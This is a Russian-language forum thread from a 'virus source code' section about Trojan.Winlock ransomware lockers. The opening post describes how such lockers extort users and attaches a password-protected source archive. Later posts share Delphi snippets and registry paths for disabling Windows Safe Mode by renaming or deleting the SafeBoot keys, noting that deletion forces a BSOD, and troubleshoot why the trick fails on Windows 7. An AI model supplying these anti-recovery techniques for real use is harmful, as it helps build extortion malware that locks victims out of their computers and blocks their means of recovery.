Простенький Trojan.Winlock на делфи

Тема в разделе "Исходники вирусов", создана пользователем X-Shar, 30 июн 2012.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Trojan.Winlock (Винлокер) — семейство вредоносных программ, блокирующих или затрудняющих работу с операционной системой, и требующих перечисление денег злоумышленникам за восстановление работоспособности компьютера. Впервые появились в конце 2007 года. Широкое распространение вирусы-вымогатели получили зимой 2009—2010 года, по некоторым данным оказались заражены миллионы компьютеров, преимущественно среди пользователей русскоязычного Интернета. Второй всплеск активности такого вредоносного ПО пришелся на май 2010 года.

    Ранее для перевода денег обычно использовались короткие премиум-номера, в настоящее время подобные программы также могут требовать перечисления денег на электронные кошельки (например, «Яндекс.Деньги»), либо баланс мобильного номера. Необходимость перевести деньги часто объясняется тем, что «Вы получили временный бесплатный доступ к сайту для взрослых, необходимо оплатить продолжение его использования», либо тем, что «на Вашем компьютере обнаружена нелицензионная копия Windows». Также возможен вариант «за просмотр и копирование и тиражирование видео с насилием над детьми и педофилии». Пути распространения Trojan.Winlock и подобных вирусов разнообразны, в значительной части случаев инфицирование происходит через уязвимости браузеров при просмотре зараженных сайтов, либо при использовании мошенниками специальных «связок», позволяющих заражать только необходимые компьютеры также через браузер.

    Trojan.Winlock условно можно разделить на 3 типа, в зависимости от того, насколько они затрудняют работу для пользователя:
    1 тип — это баннеры или порноинформеры, появляющиеся только в окне браузера. Наиболее легко удаляемый тип. Обычно они выдают себя за дополнительные плагины или надстройки для браузера.

    2 тип — это баннеры, которые остаются на рабочем столе после закрытия браузера и при этом закрывают большую его часть. Но у пользователей обычно остаётся возможность открывать другие программы, в том числе диспетчер задач и редактор реестра.

    3 тип — это тип баннеров, который загружается после полной загрузки рабочего стола Windows. Они закрывают практически весь рабочий стол, блокируют запуск диспетчера задач, редактора реестра, а также загрузку в безопасном режиме. Некоторые разновидности полностью блокируют клавиатуру, предоставляя пользователю лишь цифровые клавиши из своего «интерфейса», и рабочую мышь для ввода кода.

    Пароль:111
     

    Вложения:

    • WinLocker1.rar
      Размер файла
      1 МБ
      Просмотров:
      128
    • Мне нравится Мне нравится x 7
  2. Anubis Уважаемый пользователь
    Anubis
    Ответить в чате

    Форумчанин

    Регистрация:
    22.11.2012
    Сообщения:
    702
    Симпатии:
    2.100
    Пол:
    Мужской
    Репа:
    +2.139 / 5 / -10
    Вы на дату посмотрите-все детектят
     
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Это исходник, для ознакомления с устройством вируса !

    Написан по мойму на Делфи, простенький такой вирус !
     
    • Мне нравится Мне нравится x 4
  4. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.180
    Симпатии:
    11.094
    Пол:
    Мужской
    Репа:
    +11.242 / 47 / -6
    Jabber:
    Skype:
    Теперь если нахожу исходник всегда смотрю,чем он отличается от предшественников:)Вот и тут,тема прописана насчёт отключения безопасного режима.Везде встречаю этот код,но он не работает.В безопасный попадаешь без проблем.
    Код:
    reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\Minimal','System\CurrentControlSet\Control\SafeBoot\M',true);
      reg.CloseKey;
      reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\NetWork','System\CurrentControlSet\Control\SafeBoot\N',true);
      reg.CloseKey;
    Снимок.PNG
     
    • Мне нравится Мне нравится x 4
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Антоха,

    Способ 1.
    Удалить ветку:
    Код:
    HKEY_LOCAL_МACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
    в результате при попытке запуска безопасного режима появится BSOD.Отдыхай!!!

    Способ 2.
    Переименовать параметры Network и Minimal в
    Код:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot
    Есть ещё способ:http://www.raymond.cc/blog/disable-f8-key-to-block-access-to-safe-mode-during-windows-startup/
     
    • Мне нравится Мне нравится x 4
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Это второй способ, попробуй первый с удалением ветки, либо третий !
     
    • Мне нравится Мне нравится x 4
  7. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.180
    Симпатии:
    11.094
    Пол:
    Мужской
    Репа:
    +11.242 / 47 / -6
    Jabber:
    Skype:
    Попозже попробуем,сча жрать варю))Но что-то я сомневаюсь,что первый способ прокатит,если с переименованием не получилось,то удаление...Хотя винлок запускался с правами администратора (без прав он вообще не работает),но переименовать ему не удаётся.Вроде на XP этот способ ещё катит.У меня же подопытная семёра.Наверное это UAC-хитрит что-то.
     
    • Мне нравится Мне нравится x 4
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А в 8-ке нет безопасного режима, потести в 8-ке, интересно как работать будет !Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 4
  9. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.180
    Симпатии:
    11.094
    Пол:
    Мужской
    Репа:
    +11.242 / 47 / -6
    Jabber:
    Skype:
    Ну почему же нет,просто попасть сложнее.Кстати ты прав нужно тестить на "восьмёрке",хотя по идее уровень безопасности там должен быть выше.
    З.Ы.А в третей статье,ты имеешь ввиду попробовать команды которые использует программа
    DisableSafeMode?
     
    • Мне нравится Мне нравится x 3
  10. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.180
    Симпатии:
    11.094
    Пол:
    Мужской
    Репа:
    +11.242 / 47 / -6
    Jabber:
    Skype:
    Вот так должна удаляться ветка с Save Mode?Она не хочет удаляется или неправильно что-то сделано.
    Код:
      unit Unit1;
     
    interface
     
    uses
      Windows, Messages, SysUtils, Variants, Classes,
      Graphics, Controls, Forms, Dialogs, Registry, StdCtrls;
     
    type
      TForm1 = class(TForm)
    	procedure FormCreate(Sender: TObject);
      private
    	{ Private declarations }
      public
    	{ Public declarations }
      end;
     
    var
      Form1: TForm1;
     
    implementation
     
    {$R *.dfm}
     
    procedure TForm1.FormCreate(Sender: TObject);
    var reg: Tregistry;
    begin
      reg := tregistry.create;
      reg.rootkey := HKEY_CURRENT_USER;
      reg.lazywrite := false;
      reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
      reg.Free;
    end;
     
    end.
    Пароль:111
     

    Вложения:

    • Project1.rar
      Размер файла
      154,8 КБ
      Просмотров:
      1
    • Мне нравится Мне нравится x 4

Поделиться этой страницей